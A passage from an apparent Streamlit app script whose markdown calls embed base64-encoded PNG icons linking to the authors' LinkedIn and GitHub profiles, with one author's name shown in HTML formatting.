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)](https://www.linkedin.com/in/mertturkyilmaz/)") 
st.markdown("[![Foo](data:image/png;base64,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)](https://github.com/mertturkyi
lmaz)") with col4: st.markdown("<b><i>Sarper Yılmaz</i></b>", unsafe_allow_html=True) st.markdown("[![Foo](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAAAXNSR0IArs4c6QAAEWtJREFUaEPVWXl019WV/3zuNyF7AgFCAgmIyhoWBRcCilqhajvWDeiMSyuIOi1dXOrYOq069rTO6bRje7pbDNa6VMClteJSC1XZBBTZt0QgCSQkIRASyPq9nzkvUQ4JUJdO/+g7h3M437zfe+/z7r2fe+/nEf/kg//k58c/FMAtL6xJbW9uuwCmooYYD2ZGNg2u/q62YkNCHB3o0fDwrWe1/T2X+P8O4Kb5y89pS4hKo9hvE5lEoMSEBFFXOxSb+BhMfQnbH8Vtr8eWMDaOsOHRq4p2fRIgnxjArD8szVBbNJNCdoLai9uYcDMN7QRiCec6vJaKKgkNh5AjQwkdo2H6vYAKgBNNOCJgfYP0bF+0RA0JPVJ/d/Wk6o8D5GMDuP9+WdnoFTMVczYjbJE0mFSC3P5q9N6C9SbQKikZxFCSqyANk9sRmL8AcKyEmSR+ASgCsFvA5yH2AfGTedOKHvqHAZg+f36UYfkvgFaDGP1EXUjDk3TUyDBQMdJItIsaCHAbnamghot4DcB7dE6GxSMFWyEoj87+MLWA1mqKF0sBJBLN8frc6UV//ShAPrIFvjB/+YAE41fdcboZPgvgHQjvwpgOVwagLICtoNQB0L3IxfUW4U+SCgG7HK7tZnIXz5C42+jtIPoAWAm3QTDvKdmvYVqHKKpJjGz/w5efdeRvAflIAGYuWP4vlN0k+lnhhkF7Q5II9hA03KAyd2aaYY8cwxxsoukZgqmS/l2GfRbzgOhnEDgE49sQCgFVCDwAcLzkJSRySTYiRptMCQSa0lIPXvXTz3ym5WQgPhTATQtXXC4pMMoZAF42eAS3DBkKCB1050EaGwHvKWCgga8K2ALgxuD7MG50aSCBfDiXEkgPLCTYYoMPcWE8yVSHdhpY6dJgI3pL9qM44o8SY01Vj/Y3iq84b++JQJwUwA2PrUtLSD1yCxyX01ADMAY0SpCFhQxc60BMKQ3AOJi9DfgrEIskXE9qm5PNJhVKrO2wgjBG8ldBa6QwRUA7qXSB7XSUyjACjo2MuBCODTKdYa6dIk6h45FHZkys6w7ipABmLVx+F8mhilnwfuAJUhLNXoHUkp3So399S9uouB1rEWGpHIF9viSL2+lcD6BA4EBSlQCyBVYb/M+AfVpANhC+sy+kwD5HHKgmbAngRQTaBNQBlmfCXNDrCjYWPXr//fSPBODL85ekN0UpPwQwRu6nGJkgaDdg60/LTu1/89lDJuekJ6e2xd76Rmn14ic27CwAMJTOd52qNvIcQT0BNhBIAfQ7OvPdNJViKYiQfYcASAbQLPDJQKmEzpaQCTKV0CGAiYLeMkbFUY9oCZqQ+PCMs+qPBXFCC8xcsGK2DDebMASSA3zDDUcsZtr3Lx1zSb+MlJQPFpGAB/+6sa60tnELTL0AnI6O22OSS8tJ7uyMB+wXtc2AfImnkUiC4zVG2CVpIoR+IDKkQGOqM6AHwKdBlodgFvzfKL7+yPSiu08KICSp8sIV14j8jqBCkWtM2EUoycGBOek91vz3JeNu7m7G5zdV1L+wtewQZIc79u+IET0r8HLIBsqwhe5Nwa1ADCJY7sBSOkaKGECi3/trRgj0Jm6iYbGEDdbJdPdBWC9y9bzpE+45OYAlSxIqDqRcJPc5DuTT2YyAni7SXo7Mxv7sc2dd2yOyhGMXefydnWsXl+6roPkwKFoEem+E7ArsFa2S7n1A5ndSLxY5kUlxFKmQA0JgZgBMk9BAYj7EBkBrAFwv4nQDVgrcZM6nPamtJcGSD36QH45zoRsXvHW+QX+EtEadLrGEChkVfRzq+enT88791zGDssjOn+491LTv/r+sL4kdZZC2g/gyoFRAe+TW2nHjRAboSxFHtbB4vGQ9CYW/lQgcwhDkjhcYoTZkddAzXPwiwAjCchiLCV0IoFbQunnTJj71wQV2AXDDs8tyEhX9j2IVEKwHtQ7mF0O2V9BpEEYA7DE8J2PLmXnZVt3QrDd3V9e1O54VdRWEC4LFAJSEYCQxKPA7hM0EzgLYk4QArwHsIIBcOfaZ+Zvuli/z/aboSsCzRByCsxyGTAgicUjA0xA3ktGG4mlnvxdAdAEwe+HKMS7MFNQow2CTst15xAxDQ5CJKodUBzJYpjG4A8E8h75CMJFAqZPVVJwPMIvAOoflAB4YJ2zWBFmbqFoIqSRegjBADOW1cgArELSGbvtp6OdSL0KlJAe5o4zkEhH71ND02KMzLwru3RVAoM+WKPk2l64lsKYj49KLjGyMpa0Ue6clRa0JCbbWiIrm1niOwFPa4rgqlvZQyDRjdkpiwgEQLRCGC4ia27wl9jgO1iPRIGJpsqGhJcZlgFoA5nZmYiyScyBMpxNsd6mMwNiwBs12USoHUFU8rejrXV1I4qxnV8yCcDOhdxxspfNCGU4TsTmKUetAyuBeaQ3fmTL6c91Z6NXtlYee3hD6EbYU9s1qumPyiIHHzvnxsi2H9hxqzrxyxIC6MXm9ElMTo/TIjM1t7dp98HC8qbr+Ly9uqdwCabJTeWbc7jFppvfJQv0BbhSU3mF1RpsfuebcF49aYPr85SnpxMXWETAoFjgR8GaIOyTmkNhB8vVTs9PH3XNR4Re6A3h5e2XT/PW7D1CoGd4vc8Bdk0cGdjk6nt9c0XTZ0LyEpIQo8WRF2YqymubfrC7Z2ZmFLcngWwEb5FIOobyQ/AQuBANDAZHwi7nTJqw/GgOzn1k5weU/BnCmhAMdGxFbKFsMqo8cnyromVr/X1PHTOp+iMUlVfueWLerVML4UblZe+84b8TgY+c44BZSw4eMX7+1/eCqsro1IBooJMFCZas+cG4h0CjTAABHAM6ZN63oraMW+NITb/ZqSYreIfmaS9MB7CD0BmTJYKAvbiRceRnpI7776TFjjnOhHZUHf79uVwtgxePyek3+yqShx4H84DfucLMTg9lcfbDyh29sXt05l1MobpJxA4BJgFJIL4PsIIEdh7z8rgUzZsQdFrhx4fLh5q6BfdtKy/enhCzcE/RxUGAW7nBoPJz1+T1TMh6YOrawO4DVFbWrfrWy5E1QNxf2y6q947yRp3afs3Zv3YFF2yt/UFrTcEVuZsrI2WefmnZqdkZoKY+Oprb25q+8sGY9xR6ANop+CmSFEPaB2glnPzesQkPz7cexUOi4ItocWnw+QqsnvidjATvSp6ogDs3LSE783iVn9O1+uD+XVO1/at2uA4Be/NTg3MTrxw3+8rFzmtviw7e/+Pa81tiv62B0ug3ITKt6YOqYod3X+tof1jx/pL2tt4Ph4M2g9sIZOreOZorUTXGcsPjRGedUHXWh8J+ZC1ecS2gOgPHvLzpIsAoiTu3gZ3LFoMyU5vumjLmo+6bLdt
dsfGRNyQKK7aPzel5726ThXay0qry2/lerSoK5KWA/oHoC7Q99dvzozOQeqceud+eid+oPNLVGhIdOLfwLlS4kNFGoQoTtov1m3tXnLu4CYNaCld8B/EbR2oK/gZ5KWR9BWwiWij6hX2pK7wcvPfO48mP93rrFP1m+LdTvU4b2zUi6+4KRR6vVsMlL2/YcWbix/AActTDUSn4YFvX91uQR5wzpk9nFje55eW31vsNNByVLB5BDeqXEHoQlSVrLiLWQDhVPK5p9FMD0+Rt7ZFjDLxysI3GeoMiEFHdsN2AwTKMgVAzISjnwwNQzPrDQ0Yt7dUdl/dPrdzfKcWB8fq/aOUXDQt1ydPxpa8X+5zZUbCVQL0MSwd6AMu6bMjqxICutS8749ivrqiobm3IltJBeTUT7JU8j9VrslmOm8Qa7IlDoUQCdIlXCFQaNix2hizqPxiUunWuCQCUK1is/K2XnA1PGju7uQq+VVNU8uW7nmwQGDOubOfY/JheGRuXoeHFrRe1zm/ZUiNgB12gSayT0uf384ZeO6tezy3IBQFVj0+GY2G+S4Ewm8ZSEGSBSRTyemJT40Amr0SALxsS9JFpE5lsMwjRWYBXIl0b0yWi8a/LIO7sDeP29fbt/+87O3PC9sF9mzZ3nj8zvZoGa5zaVvxeCMSh0AK4JddG9F49uGdQzrcvc/3x1bXlVQxMkc6M/7mA6wBsovA5yFeGvPDJt4toP1u/iz0GM9db20Hj/AGB/l/JothDwtS7rX5CZMuWBqWPO7A7gxW178OyG8q2h6yrM7Vlwx/nDu7jFi1v31Dy7qXyJoNEEBwN6LEguX5807LrRub26nCFYYE9j0/ORWOrQ7aRaAfs1iBGUJon8ZfE1E350QgCzFqy4jOQEwW+D8CrMVkJxf8CGCsrNTU8Z/f1Lzkg63gLVO3+7tnR/uOGR/TIKvjG5MGTMo2PRtj2Vz2woy4XxaUi7Qs0loOmBqWPi/Ky0QcfO/fHSbd/euK/uEgcDW/wcQqiHbgiND+lLHrlm4hwwkFnn6IJ+1sLVp9LbDBH7CcqRcM/7Yu2AIGKNzM0svvO8kd88DkBphwtVkhoyOq9XVXcafWVH5c75G8p+jlg3hAIRwKNBqbhj0vDPj8rt2YWFvvny2vbqwy1PgNhM4Wsh2OV824xveoLNnXflOaEiPTqOo8RO/bPgexBvBdQaJBARc43Y3D8t9RvfvWRMF/cIKwUW+v263aHWaRiWk5Fz9+TCLi3n4veqNjyxdtdIAY+bsM+pWwm2fuvCUdHpvdOzjz3QQ8u23rdh78HLaKGMZhng7QRXAvDiaybceuztH2eB8OGmZ1beAMXDxGgo5U+KdhVcl4pKys9KrXpgythhJ4qBZzaUh342YWifjJS7L+habfx5R1XJU+t3/VTEdUHoCoo0gLcfvPTMcTlpyV0mf+vld9uqDzftDworiGQCjwdVpMEznl8wY1Rr971PKKvcNH95ttO+IaqXQVeG7ElgWSKZl5OeMsSBqN19sIGHQ3pvbG2vb2hpD11VelJi9PiQ7MySmqaWWyC1Z6cmPVbZ2JRx4HDrVaLcnHtlehXgqVnJiVfmZiTPc9Hqm1pnU2qobW5RHKMXoJrQixi5J6m5/c5fXnd+Z4XcbZxUmevQRIlToNBMBAPamTLPhzgwtJwkqwgkKLR9ZD7Bd0UVK8ZVHXUL8L+w0ILyyk5JEocBe4sKva1m0LhM0lJKX5cpk0KdxECpDSBb2LnH8giJ9z58zVlB3TvhOCmAW55c06c9OR7A2K916jCF6zuaCoXGPFBbR32SA9MRk/1OwABB09jRdOAlQKci5qWdYhUqzXyrwyYE0B1BLH0W5EQ4toEIDQsBxep86GimUCHyoXnTJjx8ssOfMAaOnXzj/FW5iNoKTHZvKG/jSHOt3f4S9ByJTmg1aPsABSWhPPA1wSxJIVtPCiIAxTIQiYCPBbAAsAxBNxLcGoRigqH0bpTQK8QQoEMElrQ55jw2Y+Kev3X4DwUQJsxcsHImIu6GvC9jzgR1BMQ5oTBT5AMoSyPwDIAa0c+GWx+RpGMXTBVOjKZUEV5oIE7v0INM++Q2lkQzoCSAmYLqg6BrwFYz3jn36qIg0X/o+ND3gbDC7PlvDUaSjrS3ea9Ei1yuZAc+I3S0eNmSLjKqPYi5Luw0BjmSWbFzoBHvkD7ewUGQbyOsIKgQoO99/12sd3joo0MifzZv2rmPdqfKT+xC3X/Y+WZw+HN07YoSEvbH7rNc+oIRaQT/GDNsrRR6qOFZ51AjTONCi2rO0EiOFVkCeSbRUSAepocXH6yW2u6fN2NyzYde+UdloRMt9NVFi5J6r7qs7f77oFkL3npJ1HAQy2j2A3r79MBU3vHuZQUdIhbR5jFqaRpJoRJiEoghnW7IlZ1g7btzZ0x4++Me/IP5H8mFui/eIYAl9DglZmvFo1dddPCLzy07zeLoYoOvdtrPCb0CaD3AfLlPoUUHIR8W+msJ+yQWN6JsW2jKP+nB/y4A3TedNX/psOIZ520L30M9BcWnk14Tyt6ZC1Ze0aiyP6UgP/ejsMrHBfSJLPBxN/lHzv+nB/B/jzziqZ3jZRgAAAAASUVORK5CYII=)](https://www.linkedin.com/in/sarperyilmaz/)") 
st.markdown("[![Foo](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAAAXNSR0IArs4c6QAACepJREFUaEO9WntwXFUZ/33n7gZM7i6ltLaCQ4Vm76ZFaiHdu03Loz6YIgoyQCl1KIijlKEgICD44ik4aEEoDo8OKoLQVuAPEYHBUQsI7e4mlJelu5tWqli0BJjsvUnaZO/5nHN2b9gke7ObNOH+leSc8zvf73ud73wnhAn4mo5IzqCwXALGQiJqYYkjIXg6MTUBICZ2wegCaCcEZYXkLV6Y/9azLfPf/d2exgsQnds2VRblCgavFICtBB0zFiNDhIdYYL2zPf3+mNePZ9PG+OJDDW/gSklYJQhKw/v9SUaPIKzzKLymN/vS7rEA1q+11tZwpGBcLoHrRwrOfUz8IrF4niC3kuSckOj6cGdHtxJmanMy6pE3jQVZzJjPTEsgcDwxGiuF1USAG52odyc6OgbqIVIXgeicZEx6vJGAY4ZsCKQE830HiIYnurIvOfVs6M+ZPneJubfYeyYTVhGjrXItE78iiqHlhR2bO2th1iQQsezTmfkhIooMgkm0s4Fr3Gz6r7U2qGfcjCc/T5JvAyHhz2dwgUic52RTfxgNY1QCEcv+FsD3AWQoECb0gul7bi51LwBZj3BjmCPMeGIVS/r5Ry7KHkAXObn0A0E4gQRKwmPdYKAzbWeWZ7mdmX+MQagxTzWbk3NJeI8DYk55MQO4MIhEVQLKbQB+fFDzwMsiZJxa2Lb5gzFLNI4FBx193MFyb/+TIBxXWs4eyDjDyW55cjjcCAI6YIuyw/d5JmxuOmDvSf97/fWeccgy7iWHHtra6DSGnoPgxZoCuCC8UOvwwB5KoLU1bDpGajDbMG2nsFj8cWl+ONuSJQZeBnGLJsGywz3MXIhNm4r+3CEEIjH7ahB+VjZbHxtsu2+1vzkEuLU1HHXFF8mT+e7Ojh3jVnHFwoNiC45UZ0TBlH8Znv/N5sRRMChdcWZc6eTSd4wgoE5YIQeyRDDVIDFfVshn1g4X0IwlTiCi5/Uc4FVmWuvkU78dR1YSEcteycBlvsWZ+UQ3n3lh+J7RmH0pE7QszOxwGJZfRw1aINJs